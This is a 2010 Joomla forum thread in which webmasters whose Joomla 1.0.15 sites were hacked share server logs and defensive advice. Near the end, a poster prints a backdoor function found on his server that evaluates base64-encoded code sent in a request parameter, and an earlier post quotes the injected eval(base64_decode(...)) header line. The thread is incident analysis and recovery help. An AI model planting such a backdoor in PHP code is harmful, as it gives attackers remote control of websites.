The Joomla! Forum ™



Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  [ 16 posts ] 
Author Message
PostPosted: Mon Sep 27, 2010 4:00 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Apr 03, 2006 9:08 am
Posts: 22
Location: Hong Kong
I have a Joomla 1.0.15 site. It was hacked. When it is accessed, it is redirected to a suspicious site. When I looked at the source of my site, I found all the php files had been changed. A piece of suspicious code was added to the beginning of every php file. It looks like

Code:
<?php /**/ eval(base64_decode(".........."));?>

Does anyone has any cue how this happens?

Thanks in advance.

Wai


Top
 Profile  
 
PostPosted: Mon Sep 27, 2010 4:30 am 
User avatar
Joomla! Guru
Joomla! Guru

Joined: Sun Oct 29, 2006 10:51 am
Posts: 849
Location: Fiji
Hi qqwwong,

Your website could have been hacked in a number of different ways ie. there is nothing in the information you have provided that hints at any particular exploit.

It may be that an extension installed on your website had a vulnerability that was exploited, or maybe your host hasn't properly secured their server. Maybe the computer you use was infected with malware that grabbed your password from somewhere you stored it (an FTP client perhaps?), or maybe as you typed it in (a keylogger). Maybe the network you accessed your site from was compromised and the passwords simply pulled off the wire (they are sent in plain text if you don't use SSL for your admin).

Basically, there are numerous ways a website can be compromised.

I would suggest wiping your server clean... ie. remove all files and databases, and reinstall from a clean backup. Change all your FTP, cpanel, and Joomla passwords.

I would also consider migrating to Joomla 1.5 since I doubt the extensions you use on your website are still being actively maintained and patched.

I'm sorry this happened to you; I know how it feels. That said, I can offer nothing more than the old advice, "backup! backup! backup!. Hopefully you already knew that and have a good backup you can restore from.

Good luck!
-Mark

_________________
http://twitter.com/mark_up.
Opinions expressed are mine alone and don't necessarily represent the views of any organisation I am associated with.


Top
 Profile  
 
PostPosted: Thu Sep 30, 2010 2:01 pm 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Mar 12, 2009 11:34 am
Posts: 102
Hi,

we have the same problem on a site in joomla 1.0.15

a russian guy have the same problem too.

http://joomlaforum.ru/index.php?topic=131149.0

with a password (htpasswd) on the administrator site it will block the attack

on my site i have (web log)

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:25 +0200] "GET /administrator/index.php HTTP/1.1" 200 992 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:26 +0200] "POST /administrator/index.php HTTP/1.1" 200 69 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:27 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6896 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:29 +0200] "POST /administrator/index2.php HTTP/1.1" 200 4689 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:30 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6938 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php HTTP/1.1" 200 36 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "POST /administrator/index2.php HTTP/1.1" 301 20 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot&mosmsg=SUCCES+ HTTP/1.1" 200 6893 "-" "Opera/9.51 (Windows NT 5.1; U; en)"

But i have no log on the ftp side.

I don't know how the put this : /mambots/system/loginJ00mla.php

Stéphane


Top
 Profile  
 
PostPosted: Sat Oct 02, 2010 1:49 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Apr 03, 2006 9:08 am
Posts: 22
Location: Hong Kong
biirc wrote:
Hi,

we have the same problem on a site in joomla 1.0.15

a russian guy have the same problem too.

http://joomlaforum.ru/index.php?topic=131149.0

with a password (htpasswd) on the administrator site it will block the attack

on my site i have (web log)

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:25 +0200] "GET /administrator/index.php HTTP/1.1" 200 992 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:26 +0200] "POST /administrator/index.php HTTP/1.1" 200 69 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:27 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6896 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:29 +0200] "POST /administrator/index2.php HTTP/1.1" 200 4689 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:30 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot HTTP/1.1" 200 6938 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php HTTP/1.1" 200 36 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "POST /administrator/index2.php HTTP/1.1" 301 20 "-" "Opera/9.51 (Windows NT 5.1; U; en)"
81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:32 +0200] "GET /administrator/index2.php?option=com_installer&element=mambot&mosmsg=SUCCES+ HTTP/1.1" 200 6893 "-" "Opera/9.51 (Windows NT 5.1; U; en)"

But i have no log on the ftp side.

I don't know how the put this : /mambots/system/loginJ00mla.php

Stéphane


Hi, Stéphane,

Thank you for your message. I had exactly the same problem, and found the strange file "loginJ00mla.php". I found the timestamp of this file is different from the timestamp on all other php files that had been modified. I'm still no able to figure out how the file was injected into the system. I already added a passwd to protect the admin back-end page.

Wai


Top
 Profile  
 
PostPosted: Sat Oct 02, 2010 2:31 pm 
User avatar
Joomla! Guru
Joomla! Guru

Joined: Sun Oct 29, 2006 10:51 am
Posts: 849
Location: Fiji
Have you checked the extensions on your site against the Joomla Vulnerable Extensions list? Maybe you have a vulnerable extension installed.

_________________
http://twitter.com/mark_up.
Opinions expressed are mine alone and don't necessarily represent the views of any organisation I am associated with.


Top
 Profile  
 
PostPosted: Sat Oct 02, 2010 2:54 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12414
Location: The Girly Side of Joomla in Sussex
apart from the extensions, i would also check the folder permissions, i do notice the mambot phrase which indicates its a very old system, perhaps you are using mambo extensions or even mambo itself!

run through this checklist and perhaps provide information on your installs eg joomla 1.0.13 etc

[ ] Run the forum post assistant and security tool Instructions available here

[ ] Ensure you have the latest version of Joomla. Delete all files in your Joomla installation. Replace the deleted files with fresh copies of a current full version of Joomla, and fresh copies of extensions and templates used. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in files and directories

[ ] Review Vulnerable Extensions List

[ ] Review and action Security Checklist checklist 7 to make sure you've gone through all of the steps.

[ ] Change all passwords and if possible user names for the website host control panel and your Joomla site.

[ ] Use proper permissions on files and directories. They should never be 777, but ideal is 644 and 755

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

If you feel none of the above applies to you read these admin tips and the what went wrong post

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Top
 Profile  
 
PostPosted: Mon Oct 04, 2010 10:28 am 
Joomla! Intern
Joomla! Intern

Joined: Wed Oct 28, 2009 12:14 pm
Posts: 89
Hello! We had the same problem. We think we found the point of entry -> com_mtree. Do you have that component installed? If so I would recommend upgrading it.


Top
 Profile  
 
PostPosted: Mon Oct 04, 2010 3:26 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Apr 03, 2006 9:08 am
Posts: 22
Location: Hong Kong
VegardAa wrote:
Hello! We had the same problem. We think we found the point of entry -> com_mtree. Do you have that component installed? If so I would recommend upgrading it.


Thank you for all your replies. I don't have this particular component installed. I'm now checking the extensions of the site against the Vulnerable Extensions List.
I had such an old version of Joomla because my client was unwilling to upgrade because the site worked for them. This time, they are convinced to upgrade to 1.5.x. Hope that can be done as soon as possible. Meanwhile, I have use .htaccess password to protect the administrator page.


Top
 Profile  
 
PostPosted: Mon Oct 04, 2010 7:22 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12414
Location: The Girly Side of Joomla in Sussex
please note - most of the VEL entries are 1.5x only BUT some may work or be beased on those for 1.0.x.

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Top
 Profile  
 
PostPosted: Tue Oct 05, 2010 1:42 pm 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Mar 12, 2009 11:34 am
Posts: 102
Hi,

This is the list of the components, modules and mambots we have

Components :
- GMAccess
- JCal Pro
- JCE Admin
- JooMap
- JPortfolio
- Mambotheme Groups
- ReMOSitory
- Sigsiu Online Business Index 2

Modules :
- mod_jcalpro_latest

Mambots :
- Easy eXtended Gallery
- MOS Document
- MosModule
- Multithumb
- Simple Image Gallery Plugin
- XTypo
- Searchbot for Sigsiu Online Business Index 2
- JCE Utilities 1.5.0

I don't know how how the file was injected into the system, i didn't see any attack on the components.
Stéphane


Top
 Profile  
 
PostPosted: Tue Oct 05, 2010 1:57 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12414
Location: The Girly Side of Joomla in Sussex
the fact that you are using mambots clearly indicates that you are using out of date and possibly vulnerable extensions.
i would consider migrating to j1.5 or contact each of the developers and ask for the latest j1.0 version, if you are using j1.0.x

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Top
 Profile  
 
PostPosted: Tue Oct 05, 2010 2:34 pm 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Mar 12, 2009 11:34 am
Posts: 102
Hi, thanks for your answer
we are in the Joomla! 1.0 » Security - 1.0.x - i know they are vulnerability.
This client call me because they have problem
This site use gmacess i will wait for joomla 1.6 for the upgrade.

I want just block the attack but i didn't see any attack on the components or manbots in the log.

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php

This is not normal, they install a mambot and uninstall it after. how ?



Stéphane


Top
 Profile  
 
PostPosted: Wed Oct 06, 2010 12:41 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Apr 03, 2006 9:08 am
Posts: 22
Location: Hong Kong
biirc wrote:
Hi, thanks for your answer
we are in the Joomla! 1.0 » Security - 1.0.x - i know they are vulnerability.
This client call me because they have problem
This site use gmacess i will wait for joomla 1.6 for the upgrade.

I want just block the attack but i didn't see any attack on the components or manbots in the log.

81.180.71.42 xxxxxxxxxxxxxxxxxxx - [13/Sep/2010:14:41:31 +0200] "POST /mambots/system/loginJ00mla.php

This is not normal, they install a mambot and uninstall it after. how ?



Stéphane


This is certainly not normal. The system should not have this particular php file. When they POST to this file, they are sending something to your system, and this loginJ00mla.php is receiving the posted data, and possibly capturing username and password. This means that there is another way that the hacker installed this file before the time shown in this log entry.

I got exactly the same log entry (different time). I am not able to find out how this php file was installed yet.


Top
 Profile  
 
PostPosted: Wed Oct 06, 2010 1:41 pm 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Mar 12, 2009 11:34 am
Posts: 102
I qqwwong,

I know it's not normal but i have the same problem
I am not able to find out how this php file was installed yet.

Nothing in the http log and the ftp log , still searching

Stéphane


Top
 Profile  
 
PostPosted: Wed Oct 06, 2010 2:24 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12414
Location: The Girly Side of Joomla in Sussex
biirc wrote:
I qqwwong,
Nothing in the http log and the ftp log , still searching
Stéphane

can i suggest you loko around your hosts forums and see if anyone else has been hit by this... possibly its a jailshell break..

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Top
 Profile  
 
PostPosted: Thu Feb 17, 2011 4:55 pm 
Joomla! Enthusiast
Joomla! Enthusiast

Joined: Thu Mar 12, 2009 11:34 am
Posts: 102
Hi,
The site of my clients was attacked, but it's seem that le last time they put a back door.

A file on mambots/pluging/login.php
defined( 'INFO_MODULES' ) or die( 'Restricted access.' );

with this function :
function jpimport($e)
{
if (!isset($_REQUEST['e'])) die( 'Restricted access' );
else eval(base64_decode($_REQUEST['e']));
}

qqwwong can you see this file too on your server , is it on your backup file ?

Stéphane.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 16 posts ] 



Who is online

Users browsing this forum: No registered users and 10 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group